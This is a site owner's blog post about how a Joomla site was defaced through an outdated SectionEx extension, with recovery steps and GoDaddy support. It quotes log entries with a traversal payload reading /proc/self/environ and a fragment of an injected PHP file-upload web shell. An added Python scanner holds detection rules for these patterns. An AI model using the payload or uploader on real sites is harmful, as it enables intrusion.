Hacked! -- GoDaddy or Joomla Component?

SimplyRaydeen was recently hacked, as some of you already found out if you visited at the end of January -- January 31st to be exact!  When it was hacked, SimplyRaydeen's home page was changed to 'You have been hacked, where is your security!'


Just to clarify up front -- it wasn't GoDaddy! ... GoDaddy's support has been excellent.  After I immediately reported it to GoDaddy support staff, they let me go through the initial process independently, cleaning up my directory structure, changing passwords, etc.  GoDaddy support staff followed up with me again and let me know when the initial hack happened and how.  They reiterated the files that were initially placed at the root of my web directory (com_joomla.php; db.php; ggk.php; kaka.php; kongkong.php; love.php; save.php -- [see article: Joomla Restricted Access Error - Home page]).  They also verified my findings below and informed me that my initial hack had indeed happened a month earlier.


Hopefully this will help some of you to troubleshoot and give you an idea of where to start to protect yourself.  This is not to say that my website will not be hacked again; but I'm learning a lot and found some helpful information on the Internet after much searching.


After following all the guidelines with regard to changing my passwords, etc., getting rid of files that I could see were changed, and getting my website back up and running (see article: Joomla Restricted Access Error - Home page), I finally accessed my log files to see what was going on.  SimplyRaydeen.com is hosted by GoDaddy, so I used my hosting management account to access all my files and change everything there.


I had no idea what I was looking for in the log file, but I downloaded the log file for January 31, 2011 and imported it into Excel.  My first step was to sort by IP address, and then I started looking at what had been accessed.  As far as I could tell, apart from several files being added, it was only my homepage that was actually changed, so I concentrated on looking for index.php.


This is what I found that stuck out like a sore thumb: 

1. IP: - GET simplyraydeen.com//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 200 1417 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

2. IP: - POST simplyraydeen.com//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 200 1485 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


There were several others of these POSTs, but I could see that the file size had changed during these events -- the number after the ' HTTP/1.1 200' went down significantly.  But the most alarming part of the log file was this:

...<input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>'; if( $_POST['_upl'] == \"Upload\" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo <b>Upload GAGAL !!!</b><br><br>'; } } ?>"...


Translated Indonesian to English -- GAGAL (failed); SUKSES (success) -- http://www.babylon.com/definition/gagal/


I then did a search for '/proc/self/environ%' on the Internet to see what this was all about. 
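The manual sort-and-search through the log described above can be automated. The following is an added example, not part of the original article: it scans access-log lines for the markers seen in the entries above (directory traversal in the query string, `proc/self/environ`, a null byte) plus the `libwww-perl` user agent. The sample lines, their IP addresses and the standard combined log layout are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (Apache combined format assumed). The 203.0.113.x and
# 198.51.100.x addresses are documentation ranges, not the ones from the real log.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Jan/2011:04:12:01 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../proc/self/environ%0000 HTTP/1.1" 200 1417 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
203.0.113.7 - - [31/Jan/2011:04:12:09 -0700] "POST /index.php?option=com_sectionex&controller=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 200 1485 "-" "Mozilla/5.0"
198.51.100.20 - - [31/Jan/2011:04:13:30 -0700] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 18234 "-" "Mozilla/5.0"
198.51.100.21 - - [31/Jan/2011:04:14:02 -0700] "GET /robots.txt HTTP/1.1" 200 304 "-" "libwww-perl/5.805"
"""

# ip, method, url, status, size, user agent
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "[^"]*" "([^"]*)"')

def decode(url):
    for _ in range(3):  # decode repeatedly so double-encoded %252e%252e is caught too
        url = unquote(url)
    return url

# Each rule receives the decoded URL and the user agent string.
RULES = [
    ("path_traversal", lambda url, ua: re.search(r"\.\.[/\\]", url) is not None),
    ("proc_self_environ", lambda url, ua: "proc/self/environ" in url.lower()),
    ("null_byte", lambda url, ua: "\x00" in url),
    ("libwww_perl_agent", lambda url, ua: "libwww-perl" in ua.lower()),
]

def scan(log_text):
    """Return one record per log line that matches at least one rule."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, raw_url, status, size, agent = m.groups()
        url = decode(raw_url)
        tags = [name for name, test in RULES if test(url, agent)]
        if tags:
            hits.append({"ip": ip, "method": method, "status": int(status),
                         "size": size, "tags": tags})
    return hits

def by_ip(hits):
    """Group the matched rule names per client address, like sorting by IP."""
    summary = {}
    for h in hits:
        summary.setdefault(h["ip"], set()).update(h["tags"])
    return {ip: sorted(tags) for ip, tags in summary.items()}
```

A status of 200 on a flagged request, as in the entries above, means the server answered it rather than rejecting it, so those lines deserve the first look.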


I used my GoDaddy control panel to access my files and change my .htaccess file there, following the information that I found at the Joomla Discussion Forum.  Using the GoDaddy control panel was for me the most secure way to change anything.


It was definitely the SectionEx extension because I hadn't updated it in a while and that appears to be evident in my log file.  My lesson learned here is to update all my extensions routinely!  I found information at the Joomla Discussion Forum again -- http://forum.joomla.org/viewtopic.php?p=2150686 that reiterates the code to be used in the .htaccess file.   One of the most important ones to insert as a 'bad_bot' is 'libwww-perl'!


In my reading/searching, it has been consistently said that an attack that is popular among the hacking community is the use of SQL injections. This type of attack is not specific to Joomla; it is used to exploit an outdated Joomla component -- in my case -- SectionEX.  Websites are under constant attack as hackers look for components that are not patched, which are easily exploited.  Web page using SectionEX on Simplyraydeen.com - http://www.simplyraydeen.com/general-technical


To download the newest version of SectionEX, go to: http://stackideas.com/


Rather than repeat the information that should be in your .htaccess file here, please visit the Joomla Discussion Forum -- http://docs.joomla.org/Htaccess_examples_%28security%29#Suggested_Master_htaccess_file -- to get the most up to date information -- they are the experts!  And, look at all of your extensions and update now. 


Thank you to GoDaddy support and the Joomla Discussion Forum!



